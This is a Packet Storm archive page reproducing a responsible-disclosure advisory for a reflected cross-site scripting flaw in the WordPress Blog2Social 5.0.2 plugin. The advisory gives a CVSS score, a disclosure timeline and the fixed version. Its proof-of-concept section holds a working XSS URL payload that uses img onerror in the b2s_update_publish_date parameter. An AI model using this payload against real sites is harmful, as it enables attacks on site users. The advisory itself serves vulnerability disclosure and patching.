what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Blog2Social 5.0.2 Cross Site Scripting

WordPress Blog2Social 5.0.2 Cross Site Scripting
Posted Feb 6, 2019
Authored by Tim Coen

WordPress Blog2Social plugin version 5.0.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2019-9576
SHA-256 | 1164c4f3459b90f4f361cf7c366150917d4e8842d712ac45c41850a2392947ab

WordPress Blog2Social 5.0.2 Cross Site Scripting

Change Mirror Download
  * Vulnerability: XSS
* Affected Software:
[Blog2Social](https://wordpress.org/plugins/blog2social/)
* Affected Version: 5.0.2
* Patched Version: 5.0.3
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 11/13/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

##### CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

##### Overview

The Blog2Social WordPress plugin is vulnerable to reflected XSS as it
echoes the b2s_update_publish_date parameter without proper encoding.

##### Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=blog2social-ship&postId=70&b2s_action=1&b2s_update_publish_date='"><img
src=x onerror=alert(1)>

##### Timeline

- 10/25/2018 Sent advisory
- 10/26/2018 Vendor confirms recipt of advisory
- 11/13/2018 Vendor releases fix
- 02/05/2019 Confirmed Fix & Disclosure

##### Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-blog2social-xss/

--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close